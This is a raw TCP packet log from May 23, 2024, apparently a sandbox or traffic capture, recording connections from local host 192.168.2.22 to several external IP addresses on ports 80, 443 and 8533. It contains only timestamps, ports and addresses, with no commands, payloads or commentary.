May 23, 2024 20:21:06.334916115 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.334963083 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.335082054 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.335120916 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.335259914 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.335300922 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.335484028 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.335495949 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.335520029 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.335536957 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.335675001 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.335716963 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.335901976 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.335943937 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.336338997 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.336384058 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.336452007 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.336491108 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.336653948 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.336699009 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.336841106 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.336883068 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.337290049 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.337336063 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.337409973 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.337451935 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.337630987 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.337644100 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.337675095 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.337686062 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.338535070 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.338578939 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.338639021 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.338677883 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.338766098 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.338804960 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.338928938 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.338978052 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.339823961 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.339849949 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.339868069 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.339878082 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.339952946 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.339962959 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.339972019 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.339996099 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.339996099 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.340087891 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.340100050 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.340107918 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.340128899 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.340128899 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.340714931 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.340756893 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.341248035 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.341258049 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.341267109 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.341284990 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.341295004 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.343014956 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.343051910 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.343060017 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.343086004 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.343283892 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.343293905 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.343321085 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.343331099 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.343545914 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.343555927 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.343586922 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.343595982 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.343734026 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.343745947 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.343770027 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.343782902 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.344129086 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.344144106 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.344153881 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.344163895 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.344171047 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.344193935 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.344237089 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.344697952 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.344723940 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.344753027 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.344907045 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.344917059 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.344933987 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.344944000 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.344954967 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.345238924 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.345280886 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.345411062 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.345452070 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.345546961 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.345560074 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.345592976 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.345602989 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.345840931 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.345882893 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.346056938 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.346070051 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.346101999 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.346112013 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.346163988 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.346241951 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.347167969 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.347178936 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.347209930 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.347218990 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.347239971 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.347251892 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.347275972 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.347285986 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.347616911 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.347664118 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.347673893 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.347711086 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.347831011 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.347871065 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.348481894 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.348494053 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.348526955 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.348609924 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.348660946 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.348752022 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.348792076 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.348870039 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.348911047 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.349334955 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.349371910 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.349438906 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.349483967 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.349658012 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.349669933 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.349709988 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.349720955 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.349854946 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.349895954 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.350231886 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.350277901 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.350328922 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.350369930 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.350522041 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.350558996 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.351075888 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.351119995 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.351140022 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.351176023 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.351315022 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.351356983 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.351469040 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.351509094 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.351941109 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.351983070 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.352013111 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.352024078 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.352049112 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.352058887 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.352175951 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.352219105 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.352777004 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.352818966 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.352886915 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.352926016 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.353100061 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.353140116 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.353246927 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.353290081 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.353624105 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.353666067 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.353749037 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.353790045 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.354585886 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.354597092 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.354631901 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.382153034 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.382235050 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.422935009 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.422950029 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.422991037 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.422998905 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.423032045 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.423037052 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.423049927 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.423070908 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.423098087 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.423443079 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.423482895 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.424088955 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.424185991 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.424226999 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.424721003 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.424757957 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.425615072 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.425654888 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.425679922 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.425713062 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.425884962 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.425895929 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.425908089 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.425925970 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.425935984 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.425950050 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.426285982 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.426304102 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.426316977 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.426352024 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.426508904 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.426521063 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.426547050 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.426554918 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.427158117 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.427170038 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.427181005 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.427203894 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.427213907 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.427278042 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.427325964 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.427339077 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.427359104 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.427370071 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.427793026 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.427804947 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.427849054 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.428370953 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.428383112 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.428394079 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.428433895 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.428443909 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.430751085 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.431642056 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.432754993 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.432818890 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.432862043 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.433022022 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.433036089 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.433046103 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.433101892 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.433101892 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.433501005 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.433512926 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.433523893 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.433535099 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.433545113 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.433553934 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.433553934 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.434075117 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.434103966 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.434103966 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.434113026 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.435297966 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.435309887 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.435321093 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.435332060 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.435340881 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.435342073 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.435352087 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.435353041 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.435365915 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.435386896 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.435585976 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.435604095 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.435614109 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.435633898 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.435643911 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.436934948 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.436949015 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.436986923 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.437011957 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.437050104 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.437596083 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.437611103 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.437623978 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.437638998 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.437649965 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.437690020 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.437701941 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.437711954 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:06.437722921 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.437751055 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.437761068 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:06.440165997 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:07.519679070 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:08.070867062 CEST	49170	443	192.168.2.22	150.171.41.11
May 23, 2024 20:21:08.070960045 CEST	443	49170	150.171.41.11	192.168.2.22
May 23, 2024 20:21:08.071017027 CEST	49170	443	192.168.2.22	150.171.41.11
May 23, 2024 20:21:08.077176094 CEST	49170	443	192.168.2.22	150.171.41.11
May 23, 2024 20:21:08.077219009 CEST	443	49170	150.171.41.11	192.168.2.22
May 23, 2024 20:21:08.077276945 CEST	49170	443	192.168.2.22	150.171.41.11
May 23, 2024 20:21:08.117167950 CEST	80	49168	94.156.67.72	192.168.2.22
May 23, 2024 20:21:08.117232084 CEST	49168	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:08.234968901 CEST	49171	443	192.168.2.22	13.107.137.11
May 23, 2024 20:21:08.235002995 CEST	443	49171	13.107.137.11	192.168.2.22
May 23, 2024 20:21:08.235069036 CEST	49171	443	192.168.2.22	13.107.137.11
May 23, 2024 20:21:08.253604889 CEST	49171	443	192.168.2.22	13.107.137.11
May 23, 2024 20:21:08.253629923 CEST	443	49171	13.107.137.11	192.168.2.22
May 23, 2024 20:21:08.910821915 CEST	443	49171	13.107.137.11	192.168.2.22
May 23, 2024 20:21:08.910953999 CEST	49171	443	192.168.2.22	13.107.137.11
May 23, 2024 20:21:09.037045002 CEST	49171	443	192.168.2.22	13.107.137.11
May 23, 2024 20:21:09.037090063 CEST	443	49171	13.107.137.11	192.168.2.22
May 23, 2024 20:21:09.037497997 CEST	443	49171	13.107.137.11	192.168.2.22
May 23, 2024 20:21:09.242506027 CEST	443	49171	13.107.137.11	192.168.2.22
May 23, 2024 20:21:09.242561102 CEST	49171	443	192.168.2.22	13.107.137.11
May 23, 2024 20:21:09.309109926 CEST	49171	443	192.168.2.22	13.107.137.11
May 23, 2024 20:21:09.350497961 CEST	443	49171	13.107.137.11	192.168.2.22
May 23, 2024 20:21:09.588880062 CEST	443	49171	13.107.137.11	192.168.2.22
May 23, 2024 20:21:09.589643002 CEST	443	49171	13.107.137.11	192.168.2.22
May 23, 2024 20:21:09.589692116 CEST	49171	443	192.168.2.22	13.107.137.11
May 23, 2024 20:21:09.589765072 CEST	49171	443	192.168.2.22	13.107.137.11
May 23, 2024 20:21:09.589781046 CEST	443	49171	13.107.137.11	192.168.2.22
May 23, 2024 20:21:12.682890892 CEST	49173	8533	192.168.2.22	91.92.251.26
May 23, 2024 20:21:12.694945097 CEST	8533	49173	91.92.251.26	192.168.2.22
May 23, 2024 20:21:12.695012093 CEST	49173	8533	192.168.2.22	91.92.251.26
May 23, 2024 20:21:12.699537992 CEST	49173	8533	192.168.2.22	91.92.251.26
May 23, 2024 20:21:12.710988998 CEST	8533	49173	91.92.251.26	192.168.2.22
May 23, 2024 20:21:13.352015972 CEST	8533	49173	91.92.251.26	192.168.2.22
May 23, 2024 20:21:13.498806953 CEST	8533	49173	91.92.251.26	192.168.2.22
May 23, 2024 20:21:13.498986959 CEST	49173	8533	192.168.2.22	91.92.251.26
May 23, 2024 20:21:13.502772093 CEST	49173	8533	192.168.2.22	91.92.251.26
May 23, 2024 20:21:13.515249014 CEST	8533	49173	91.92.251.26	192.168.2.22
May 23, 2024 20:21:13.515302896 CEST	49173	8533	192.168.2.22	91.92.251.26
May 23, 2024 20:21:13.525962114 CEST	8533	49173	91.92.251.26	192.168.2.22
May 23, 2024 20:21:14.182883024 CEST	8533	49173	91.92.251.26	192.168.2.22
May 23, 2024 20:21:14.184302092 CEST	49173	8533	192.168.2.22	91.92.251.26
May 23, 2024 20:21:14.189225912 CEST	8533	49173	91.92.251.26	192.168.2.22
May 23, 2024 20:21:14.311125040 CEST	8533	49173	91.92.251.26	192.168.2.22
May 23, 2024 20:21:14.348349094 CEST	49174	80	192.168.2.22	178.237.33.50
May 23, 2024 20:21:14.374434948 CEST	80	49174	178.237.33.50	192.168.2.22
May 23, 2024 20:21:14.375667095 CEST	49174	80	192.168.2.22	178.237.33.50
May 23, 2024 20:21:14.385339975 CEST	49174	80	192.168.2.22	178.237.33.50
May 23, 2024 20:21:14.417984962 CEST	80	49174	178.237.33.50	192.168.2.22
May 23, 2024 20:21:14.512634993 CEST	49173	8533	192.168.2.22	91.92.251.26
May 23, 2024 20:21:14.550710917 CEST	8533	49173	91.92.251.26	192.168.2.22
May 23, 2024 20:21:14.550893068 CEST	49173	8533	192.168.2.22	91.92.251.26
May 23, 2024 20:21:14.980772972 CEST	8533	49173	91.92.251.26	192.168.2.22
May 23, 2024 20:21:14.984006882 CEST	49173	8533	192.168.2.22	91.92.251.26
May 23, 2024 20:21:14.990283966 CEST	8533	49173	91.92.251.26	192.168.2.22
May 23, 2024 20:21:15.016427994 CEST	80	49174	178.237.33.50	192.168.2.22
May 23, 2024 20:21:15.017720938 CEST	49174	80	192.168.2.22	178.237.33.50
May 23, 2024 20:21:15.042479992 CEST	49173	8533	192.168.2.22	91.92.251.26
May 23, 2024 20:21:15.065089941 CEST	8533	49173	91.92.251.26	192.168.2.22
May 23, 2024 20:21:16.000041008 CEST	80	49174	178.237.33.50	192.168.2.22
May 23, 2024 20:21:16.000103951 CEST	49174	80	192.168.2.22	178.237.33.50
May 23, 2024 20:21:44.986279964 CEST	8533	49173	91.92.251.26	192.168.2.22
May 23, 2024 20:21:44.987716913 CEST	49173	8533	192.168.2.22	91.92.251.26
May 23, 2024 20:21:45.010690928 CEST	8533	49173	91.92.251.26	192.168.2.22
May 23, 2024 20:22:15.071388006 CEST	8533	49173	91.92.251.26	192.168.2.22
